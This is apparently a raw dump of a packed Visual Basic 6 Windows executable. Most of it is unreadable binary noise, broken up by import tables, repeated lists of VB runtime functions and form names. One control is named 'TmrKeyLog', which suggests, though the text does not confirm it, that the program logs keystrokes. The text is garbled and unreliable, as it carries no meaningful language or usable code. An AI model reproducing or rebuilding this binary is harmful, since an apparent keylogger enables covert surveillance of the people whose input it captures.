5S=3AR
;1;}#+$
Ct8~4
QRT-'E
QRK* H?c
^&N0F1
3^SW"x
Y~g_//NZ$M6]Omt
eEOu_[^(7_
'x}tC'>=
jUV~.=
}TQ;v5
azZeqW
I*tw5L{++
j.'XH:K
FQ>j)z
;W:HN?0T
r?c<F^%af
caw}-4U
4E~#=<t~;sv+`,wf9v
xvu)C+
+f]IPn8|rZ`
Q]'OuA3$
m<}oo9Hp
|Rs64|
4((Up`
EEU<Ot5g+=*9-5 -%9V
%wbb]OF#A?0K,hOAuA#t?Wsl
xk}3LP#
F$vw)!hz|
L~|m;v
PDEw]w
)U#P8=V
YF>?[ed]|`AG/u's[Pso_
khlrR_
O[T%yXJ
;u&PzW8
5rpuSQ
QV#$H!(=c2
="/t G
R[ j/P3Cq
)Rk#dShOP}LpQ<G`e7
}urVZ}\
<49"eW=E
,"D4Uh@TW
uAvD@W,
$%D;pwuuLQf
TolVZWEb
d3eG;G\HD
|$V0PY
.MXypH
DRP^(=
`sB=4[
C2PS%|kAKfPf
3;si",$$
34,gr47
\@;|;!V
A7.A.t
*8@$19
JP#<GH
SUU0VWF!"f
D|adu C
f$S=jV0%
%W]Z=gfPC5
`S}o1C</tK<:tG<\tCAg~
k6RV-(u
C]|ob
Q3;WucO(
S3;vM8\
Pq\qPtI\
]4}wgc
3;tbFVY&
!8[T~4ShX$(V
30@.4o3q*Sn oe~
V)L;G[M
V",E[Hb
zuFQD.
Wxipw#|
Wc<R]0
BQujVfzu
&;9$I W
j 9y:P
q2!WV\`5
-kF:WGu
jf#CH(
YNs^(
jovhJhB$
.Xl73BWM
v |,-g&
H|v<#w>
` !H@uf
ldf:u;,"g
;w`i+\$tSz@iJ
Wj3,xD
HABQ@6hg6Cd
;@P|B!}Z
mGgO`It
'gU4*L0|I<aIk4=
vEUaL{Ur%u
=bS( UN(
>|x@;~
0z+eO<
u^3?.O
N;"~0a
8Ut\Ot%%+
*)F7n2
S5~U]H
VW,=<t
CB#;t<CF
"9|jW@
F|MUUV|7
;`p}&:+
^)0P=Nuy8&
RP-Pp*rc
j"=tLv!wL
0x^.2=zC@
OFb?P"V
SH5=vbd
QN}urbqZw
!{x`u%
@>nkY-VP
x|_{f]s:f?
L|:w,,
Xd "Tv8v
VjhA|M
y@P)*)Tk3
",N7J8
cY0*9sf
(7f_%8;
X[H;r!4
797;~AW
r;rEPw1m
<SVX'%n
<?t#<*t<[t
]\k][?u
PoA7*uV>
q-FRW<[
]FI?(-;
sEl`IXt;
/iq;. SRVgP
n}U<!f75S
W\;r0,
y@raT-
.?vvA*
+u3/ +W
]v.FG]mUsne
WSTw~p
P%P\t
\(e(@bQpR$6E
74bgvu_2
",T4R%d{
#m4u_!P%
A`=Zx\GO0u
((VW8hWHL
RWPujI|xoT
9=POFT>
]Q nN| $VR_w
/4{!^]5,
[PSc5M
bt!3l(\*sM
PRSJ2ddrY0'[t
&z2HlIT
BdQ1t!
Z{;^HUY~6
*-bDt/
8<PYi(t
P0Im-,=_
cQPH$@E
-e<rH^
UV`Wux
""cI\E
+Z(V\$$
I)H;`v
w0Fv;6&
F z]`&
F/)#0uatnZX
W3P/R(Y
^| $bm-$~
G"(_ZD9+@`W
/S_4D<Uu
.d6E+</M~st/EqPCIP!
2&XS^?14$Q>_)
x;?UVL
[+rR+3
'boty/SVM@
.LPB@Rj
hS_V,W2
.VMD;B
SZ-~6z
u+*F0z
jdHMI}$D
2`A@lx{81\
8n/s2#~
<QVKTc
08ctM'
0W&8V/tO
s8Eia9V$
F N@PG
<TZdqCMR ]}6">4
ZDyBU>%D$#VvH)
yjlXX3
@whR_F
*ZSDfF7V
C^2%Mc%7
G O@vC
P#}a'3
VWWhQ<^_I
P0|'<_
T;$]&ft2}
TROENa!y
g4PLF$weyN
|ChG.]
oqug>DR
SX3K0$.
Qtwo*bGpH
Qf7@E.%2)9@H
$7DB3,,J
Sp22[t7
\`2222dhlpY5t\
EFf#3d#
8CWSXu
`'iZrA%
Spf<dH.-d
Gzk"k<E
8)[zgNy
MD=JaH
Buj=
CMUQnERpq
|RA|qlt%4NPV
LXp6(PpU
qb@.WW(@
tC]*><R
Fl=Ku|>;u(96u g8
\tH`gcdh
hA9]tF
8_D<|
+:Pt`;:u
XR;5vr
^}i'Et
e9""$GT*r
d>sVySOC\
`tt,Q\UVu|u7up
z2hu`[
9u]XS-b
bz=i5u1jt%_
{Np?tt3/
OH&EgXj
U;+O`4
`SuwC]]
vC](_,
Z]_Q>(5
0PEG(Xw
'/uLQj
Jc!tI4l
8q0NU<
p?LbR,P
L!.X yl
s<tF @F@*;g
('~\7JFcW}G\
2$N|X#8Q
R3DOEPk
rF8'|#HDE5
>_4X7Q(E
(*H&>6Ch
Q8qG>`URWG0t~uIME"
B9huc$,9CG!|)`
PHx$L5+
w)]ps
L]rewTVA0
VJ=l6B
u[3R"E
t0{U6kx
{>EzDRW
_=kn.r
4Ci.Ajk4:
}Y`\a0W_Z{)Q#H
;^#bB}M
76j$7r7$ma7
9uS]oq
"W@9 <*
^/H(i[
5ZF!{WA`9C
yL^Im2
`P$ BD,V
c=G`B
g@a;NL`
8g":c
@W@?5yt
QInMa
09(|$`
P;/hu21
[)]3mb
Sx&i/_
<+C(*8
)eHP;/
B(.iU`'IGS4
&:+iC)
9t8Zk$
+90/P5T
iu2;=&.4
X95<qHDUQ;~{`MEg
-.8G^ w
(g>K<L
{V@C3G{
-uV"-#T,v
s/ 8/14z
zEl+c{l)J&2Y0(
"#'&8!
XopL=}IlfS&['gYlL3Y%$f
G0d+0p
M,b%*^4J+++
H{+v:lt(X"#U
/4Ra#C
jeO,3P
/.@;ipD/
D8wg.KA
'lCU4j
'0?f;M
9,l<wc
=(0tcQ
F8)x(,I
675"4g
ha5$y0./@#-,
c?*PA/a
(hKJf(MY7dLY*Q
9ePON!Ye0UTS
owF)? ,o(4@:
?q\$DD
!?Iv4;5Ns
VZ>RtLBL,3L<C\./-,H
\MVOiz
j?!6)@
s[E:^M,CB'#iED
RnB*^E
V:SZw}AS%
U33[Es
e~_[k5}@uJ8
!<=gH;:uA
bX%-Jz(LKu
,+g4t@
PRSZo[ah
r|Rtn'
^AL_87GZ;
p8;-5rcs
xGH`EaV;SF
HPqQx8C;
NHNQ+,
-]t!PH
1^(fx+]t
1huL3&
p!N64g
utE~@;t;Q
4_UVb6
DaK2=O
]TD+Hm
| 5WV $
.V)3*+a
n0{W}0
I444W!4_N,
,PQA U
r!'$D$
]pv!VSK'
V4V8q]\US]j&
XG ywV<5R01
)aGm\Hxft
Je5)(DWI
~b~H=E
HM__G5ta
{u _v
>S^<;[t
GQYh2K
n]+Vgw"
YgK^^Pt
EN{dSj/n,
EMc)9"8PA#
$U/8r8?
PXR$ Z
nQ-$/PR4(
X^w[L!
#&'$;vE
Z/6A\4
{^0kF<PQ
D<O4.v
}#BA<'Q
HUc`n;X
j@Ap/PI
#])3<3{N
xuL9E/(ct
f:z<Rf9
%#pt!\
Y@kp@,
{iNw&7
'h!5WyCU
xw(m|pA
s\=::T
?JD"l)!rYnH:t0<;t,c#B
SRs0&w
bAimUT
1VCljQiB
dJwK6"(
"~M$pN
Q(|.@-
Yu!a={561
m AXx|
+d$TY_63s ]
=#E;S2
P)B;Bei
[=Y5M]|pk}kQc
m=P$Mu
Md74X^7|F
4L7C`;
mmd071GZ3
u-V?Ywu
'O[^_WxhN
[xW8jAOdA
yW,3;tj
:td9T^
}HMV%~2
M</+'@kw/,2< }
y~+;v#W}
,_{$QaN
_]'}E8$(;t
OOu.u!OOu
}9Ji+=
=D_)Ow
GF 7\(m)jY
~jYHOgVE
2$]Ou|
2~|h}}^(
h%bptcO)
O(x >w"HY
at4H']#
^9zs/r
+;#|r>M)Ag
[O7*u#;
+PSM/K6T7)
ERu^_[B8
Ci8t'tn
PiB!2#`
)\`kbP;F7?Lt>S6,
WG]1S(i
jzI./.
S?uo!K
GIt%[[)?u[:Q
m:/KuJ
]"tl0]U
uD~Eu#j
N|Vw/!
WsCx<K
Suq4s
v/VET1uI\
Oo[ICH9O;
^`=GZnw
PS[*j
R5.p(v8S
-Q==SLp
Bufa30t^K
usU\+s
1U33gjI;7f
m1%/>+
Bu?Y9(
a;YY4Hu10
u'$(+@g{^J
TVQLff
_,9DaW
[iYp \X
gVYHzBoW
H-&j"Y
0tkJzO+aW]{
z!>;!:=/
_l/7G6Y=Z1$
_9}E(wFI=
Fz]hQ;
4.@J\Wg
:|%jrE3v#
~|-][u
.LY3;W&>
Mt"$VSb
yt`!u
j]Wc}Y
)YOkm~%
pk%O=e
@}Y.tTP|y
,B_t=P#
1B6,u$
9$IHO@
D~;s#9
1M8;>G
!M1+F5R
oa=\cj
&(tMj)^#
mOftM
@A9)P-'6
uxtsO`
}8_&K:
8$8EL>
h%xCKh
S}V$'O<
j7xs!_W{
}7%A-$lxjAr6
7)j],IAi;=|D
\T*TuA>"u>M
x,'E0
|)QGJq
&{tM!9
Nw45Ds^. y
Oq7W3:@
x}(WEau?;
#f8MZu
E,O}-vK<hF
zJ}>j,
BOg=wYqp
xi kCHeg-f
|&7]['x
P$"hF6
j?ZwqKKiL s
!y!JA=\4{
0]i]p&+u"
p;Ao";tcLq{q@
u&21K=v-9o>
y'^bQ\o
SQ?ev?,{
#xieRC%
Q+QH"
Klx_%
D;#~W#
3uYHy6s|s
6_5hmot
J'k(-U
^C8EZ_#
tE3Lu_
JCJnxa
O^E|8a#\D
Sl1Y]E
})OKt"
u^:<iN]
WqANCoiD
pw<GH
_$l8kO
__iEH+
O1/_HK
KYK,YY\
FKm\3HgS
98u61CO
J#JE1H&=I
atv@e9
W~0B&Y`
|?3?ru9A
-DxNt/
m}DmBv
u&GA Z
;r Oi3>
F'O?h4~
uVMV?p
41-)Y1T
^;P$|CFsN\
9Ui7{U
4V\1q1
)Er4As~
~q`se&
uB:wEi
;w+Cv'Ws
iltj7]a0 |"
X_p??.;$t(v
R=XP/YQ
VC20XC00x
arctEV`u5kaT
NNhravM
F080$mb@
7H"O} a}9X
U|M (Jz(Pk(8H.w
I5)FG_
k<fV[w(Z
k-'EJ+
PSj? eni,jhWq[)
:62`?I
rdvzq0
+02/%?4,^\
+(#>F6OPdl8
i:uN[kcg
;WB=W?
,;}scAfA
0UU;P79L
=;|A%#2QH
iDt03Pax}
1G#GhO@S
@QI$HU
a E1\"?s8
H1KG`U
[R6.nE
<w(*Dp
2H8:<Px;
btHHt.
@C=u.xiQ-
0Aj{;t7pu!Y`7.
[8n:$7, O<pO
X^:nbfU^
}O{Z}@P
DQ6H]a$Gr
S#+%0{ s4#%v(!{
@DjaP=!V|
h1G6xQ
_u]}_9c_,b
`32&>|e
%,M+MZ
@giR+ia"H|
maw\EOw
+(Utbj
^9u0/0A7
TLD<44
,DDM4MB4
-R 4c9
iC'oI9
W KWtE!)
1$!&n2[)V98C
H_SFZu
Xk|Msr/
#Y)Sm
A6u$UW
x-DCeN
FtTILu7}%}E6u,
49u#{e
'E"mht
@3N}[q
S<Ct}q
3~ nt(
5W$K}+av
-A~m{`O
NMOSe|L-Gm}
ufQ\E6
E!aHqv
&R8k~J
kb{0sE
\uskj0[*
xD{3|]u
]t_G<kAY
:o:w!e
jsEXPaX
(xuO)!
$By]+A
5SuMF$
O;+YpA%N
EW3>'0P
A/Nb;
9U. |
GeY) 3+t;-
GGN 31
mv1,hn@g
[eZih#X/
Z"xtCk
fm0~BZ
Y@mHPZg
r$GEPNA
Z9/}}2
(tuYUA
Lt3{Y`,E
0YH:)gu
Q6;.{IA|Y
'Td<+3q(t
to$AvMI+z
5/6 YLz
uYAzt!
@*7w%
IDJ}90
Lg3MP*=Y|!
*hM4v6}
SYf}~!
Pm?K::D
AcQ9f:P.A,
b.ba4p.V
[qI66F
- *7!$+(!,&d,-0.
0L2!8D<,GE@F2!DGHH,GLLIPJ2!
TKXGLL\M`!
,NdOL2h8l9
,Gp:t;L2!x<|wB=OBF
>&?F&dd@AL
L)U$K' +
3Fh;L+v
8<l'%@D
2HLP C0TX
2 ptx$|
14;^t>)
=[qHt#
'{W!8HA1@
gE_YK\
,0O&uK$}<;
+k+G,*l#s!-tpG3kP
*T+Uw ,V@D-$
~/VjSe0
#"{E#4M0
x2kbZZ~
k@?PP02
~,8]t'i
d-J%f
CA$&x&.!0AD11#\L/
.s) :-`
DL>{,N
PHl%+hsOM
Nx@;EVhfH
N02`C~5Ph
]*|C`?%
\nz4<V7q
N>OJGA~Z)^9
vmhg.}k"Y$
A"=:P1_
g@gEjxia)7f%
t@:P}_A##
tOSO|i;+SB;t9&x"Wkt
iZP@Mt14,
u(k}J5j[
@@=|ll
;#pC;+
,a9Fv((
}_uk,m
sZ~a^z@h
UO87aA!"J
}PSP;g
1A#H}F*
Pey`
Ud`^cMF
\=8t9
U%YE?"kk
7{!U]:h>S$D
_SOHSk
7?8"utD
w_F9C=
wefXVB
\FcR A
-SU*h[
Bzt!(d
4/t2jFN#9U
gO]JCAlr
Nct<At
z\up:PA*!h[
uX^A|V
pB<v)3P|
6Oa@7_&
($]0tWFM
j,iO[o2
fPC t_h
!WNPNP
$,4G;A
_u@WPW
eo?[7'9]
y3]9}C u
AEAj )QB
r"=8]t
2;z1as2
)W5ppy
M1-5w-
Op[R?j
_0B=2|V<
(D"=Gt,={!<z=w
@'vAAC
@=ewlrSqW`
RxT/S)tu
WU#;w
'BBB%_[jX[*rV,
YGm:V=ViFcK
%Kc1ar
t&Uj=eY$[;t@I3;|
Hzt>k
8Z"'O@W%|C?
/o24<(
+mO@MS
[7.WwY+
#S@L|m
m]uAWx!>(P+,t
Ml^1]z3
VP YuRr
#7Ju*+}
XZbTBY
X5e!FCa
P+\3T*]"
*;(ggx_uM;Q?^SCbCtGWYE}
oOp7N<tk&^xuw
8fe{0sC
,0F>`!
G7sPkS
.'y3tU
G3~1>Mvu
lx;o]
'G8t,A<
tQQ@$
0VWj1bTL
g_Gl,WZRtP{y t
ICTH)Qub
$UpSMoE
cHS$U(
,uFWW-4
}<EX:6
?MM%;w[t2E
X<v/YT@
tE~C9M#
%,?J43;VVVd%%f:4
hu-VVg@t
5VVC"%Wi;
}WW^}%9
Xs988:p
oA*S^6V
0*Hh=-EU
RlqQ8U
ctWp .P)
& XN]]
=3 "KK
vBW!f)"
]"8+pE0q.+WW
.vmX*R
0,*!r[
CP%FpUIr7Cb{f*-X$~n=
RuaJ|[
sePdD.
PAP. fS
A'[/`QywE
wS8/kY
E3}+?8X
Ku 0Hq
ig/&8**
vDt}l'
8D E$5yp:UPH';f"SW
+B:Q~48Yf<
i:pleSoD
0N?=>[xXI7~u,
A),dr+
7t0'Ht
L'%/S_
TT)9H$
tS>!J~a.uC
qlf;ufo-S
!\JU?x(7"DRi
i0P%^@
=tQ-\F60:u
e}Vtl_7NeW;
@0M-`E6
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMY:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkal
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
l/@LC_TIME
MONETARYCTYPEZ
OLLKnATEA
__GLOBe_HEAP_SELEEDn-`SVCRT/`CnMonTueWedThuFriSat5nFebMarApr
lAugSe
pOctNovDec~TZUv
PX (y8PX
])dn]l
Paggu&Uru
Ar1ntinaHPe_VColombi$
D+Qic; R
outh Afr.^m
Luxe9stagCSwitz
tIaCnd>p
i.s- 5dOra&rU)EnglxfF'"GOn/B?Mgium
Mexo/asq
Tcu{`;Y_-7
kqg'mh#dk & tob
UvakGg<o-,k-'i+
ew-ahggmV*
bte;/ci
ksss-f
i'u?k '?X
D'n^Jmi
.di{gW' s#
v'cIidgr7`fc/r'J['gGb]ivDa>
eMKzqOn/
sk'),1kO
'htsso5q
f'a|fL
k4-y7il/v
jG=irev-`ib+
aT`i7b
ttM[t'sa;0S'mpVV
:/MrrI
'wLOSS#
SING_?OMA%#R60U~28
- abl6m
a hpo.
GN7t.gqTNcGf\;
qao63<std5
rW+CgKcF c
opecU27
cW82<nIc3
Y_lock
AuAm_0xK9!UmH!
\V8</{
uPsV2f'
tup{"MdM[b
sf+VcTC++ R
7H:myd
, Mnk
AH{bp{
t)q15R
ne}ic0v
ny~vfG
vn^NfF>]
~3GetLaA?!Popup&Wi
ageBoxA
C=32.d
cmdM<exe/\
jHNhUKoc memory_*G zip l=t
\~ZDf5gC'y
z`d%Q[o{-b/$
uwmd7X
Orivgh-$^z
v*X~erboseunp#{.t
rqQuietnz9
Q'DOSNJk SF=
XozEnc
rNd^F8
ViA?ffs
s0ptsq
zdB])U[
2919
-leJd:dull&J
t'oF--
cEy[wl
O;6Hdo!
AB6plxk_tupj[p
bi*lMtOn gic`fz
|SeSby3
Lm&Bb#
7>0Axy
sbvh09.]buff
:;,=+"[]<>| /
$At!oYx:\
\\^YfZ
zQtfE6
=u,GwM
->d%%v
vp T(ofXa}
NffmDZ#
Gw#!r+bV
urd,-f
GF-ABF
dbKGyk8&
ypwi)^d[d;U
AmNPce5&!
s.]05O
W--biP
eXGZtGI{%2d
eaph CJDG3%nc'=-f+
@ge,+xx
d$ h2nbx\
9if;b
Rv%F`>O
-daX xgbu mdo
hh8A,[
[a%s:R(
#USqFt!
run,F+ 6eM
o-gV,y
Sx,15,H~!!X:`F?McK
[W]%XQ
e-u--=
02x,.X
k@:!IX=^z
UyZsd@&
%byaA;(
kK~sitb) !=QBj9qla3
_u0x4xN
\x fqg`P,w-HI
Eype(Qm( .WTb
3VHI>X
`85:F
o5fd%n
p?|rQK\
FC,iMz
3~l&$a
65AC6l
Yl/mV lip
4Z,2 Xu<0
F00e=7!
g:YwM4M
x_p40a
ybFIN
>1dSVESWE22-2EUQ4
-MVMEX
c07xDEApALUT
9h2%EN\S
"X`_DN`
W_C<CA
0GTMW+3S$CHE
W 20VV
\EN$4O?COL(8s%
RPER,J
HcSARG
030FECU9J44L
CHL88+sYURY<cZ@ZP/~
GBRC HNCZE.
|NLDHKGNZLa
|PRItSVKdNXKOldH<(TTO
ZHHI.CHS
ap?\T
BYYIJZYST G
\Ho8,mw/(
NPTBp^4+m
`P7<z
FEGYHMYNI|AhYYZXRDU4
\xLy<z
af50`y!O
_j2=Ws1~
<840,ii(
4MsM4Mi5^A
4MxldXL
4MHD<(
GetDriveTypeAM[^Lea
{RelseMuox
Wa=ForSoL[-ObjJ
)CloAH
eLdExch+g(t
2HpF#e
V4R!,l[rcmpi
u1PhNamn7
<To[3O+Loj
u'Curn%SC
vWidUr]`8
-l+e_-uqlm
K#hp0nlen_d+
8(TvIPTSae1n
S[E$-ZGWTewPUkdPi5PVmrDeCA[WrPoimOsh"Bj
fa LCI_D
W/-nB\:pa!A
Addrc
:T7eni
`;@`yL
89K}i#|l0Q1Op
6wvsptf
%.'$M{
;|-7CG
"9\akp
>EM+/@cB}d)O
)]bq)!
-_.1%0g/"5F
\5=[]u
!V}r{4O
XS<1#*BW!
3|CDxA
v0lC 33
iF%HO0[
WN_7=Y[
3h%E1
C& 85<9
R+5>I(
:1+E%G
@.MOD
re4w]O!0
[dZSB>
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
LoadLibraryA
GetProcAddress
OpenProcessToken
wvsprintfA
ZIP32.dll
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
5lJE@.F
:@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:cx>zx:@
2eTH@$2@
>e@>@0Ae@A@05@
@@$<x@<@0J`
5lJE@.F
C@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:\x>zx:@
C@p<pp<@
5lJE@.F
:@HAc`A@
0`x9gx9@
5pJE@.F
C@HAe`A@
:\x>zx:@
TH@$1@
JJ@.5@
>eHM@0>@
HQ@0:@
TR@$1@
HQ@0:@
A|HO@0M
TQ@$<@
qMzxM@
]Tp]@p@
5lJE@.F
=@HAm`A@
0`x9gx9@
5pJE@.F
C@HAp`A@
:\x>zx:@
<^xAex<@
Fyx:yxF@
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
`.data
R9N&Yk
I7$(CC
!FHlv9
e%:gKhCy
3 dOidogL
G%Hotgai
O,O/imM
#1?aIA$
C70a4>N
KERNEL32ADV
APIiUS5
pLibra[
&Hk~ -
&SVers'
}7)nJK7MThd
n,5-Wh
&lbUhI
a7*nx4
gZV[EWiWhK
,G5\6,*
u1>xlH&[
%Kj;E4[
P+uffm[
`<<<<U
7P+vkm7RoU+J
>uaq<W
y|E<,;m}2
H@Ekm)lQC.)F0!5_CE.A09k
5@6'/n@@F6y5.Ok
>@b5lJn.
_px=fC
9`xnBpv
Yx^X[<9
c4C2p`\p`!Gp
[,+n^([
Z("4[:
rn=&d6
>`T2`M
Af&>\+\k|
H+eT$5ee`>{
00T,8|
:O<9.2
<<>AO7
v>mo77+\$W7:T
4$y&7Kx@0`\
yVHpyCgye\CFxq4/
\@qT<TdA
qqgF<5 Tx:C
)99Q2)L
HsQy95[
2 llll
4`LLOeq&[
1^H1niF=V:<5
5qlw-/MvMN.d
p`$\73'E^MkY<`OO/3=TD
v/Avp[^
X:VEgr:al>Q@L`L`Z
p@+lpeeepeVgEx\
u1T1@qETX$+U2c(9
\1T@tM
e1Tp Xp 2pWWlBp
Wp=p$W%1T$iM
?Ug;<f
6QMM[#^Q~Qa!]6O0/l@
P9q8rphlH0n
`/$l2M6N
+6E+._QbyTTA*$RR@4-.QQ4mb.OO
G]9n0fX&
Q:.O=l(M=AO
ua>7'xy+0xOMK?L.Lp0K
g'@QA
JO7Jz]">o@9
'>ONm@_>y+X/~
_0lzvA
[.VRt;)v
GZ|oH7x
M499;;,y
CGz8Gv<
QJfdv
#em'm^
rQ6$mmm
LdLQ\X
X5:6]T]
/^&1<u+V;
V+nV;WCo1B@ePC`
`>pBZsF$
MmheslFFX
M< 9{0d0<c<y1_T<4cX
T<d\QFF/2}
adj_fptan?4DIku
|[CAry
57div_nm64k
+m1B,J
b"3 5CV
u)ERQ
)@E}`rG?V
rq1Pn{w.0
AEVENT_SIN-K_
DFuna4
I%Ompac,
vqrudseJ
^x-$aoy[`
2-,Dj<
}ZeZ/d$K#%U
FUu?isj
dff,mxw"%
O.mtp^
+@Oad=c
GPGWHU
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
MSVBVM60.DLL
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
L!This program cannot be run in DOS mG
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
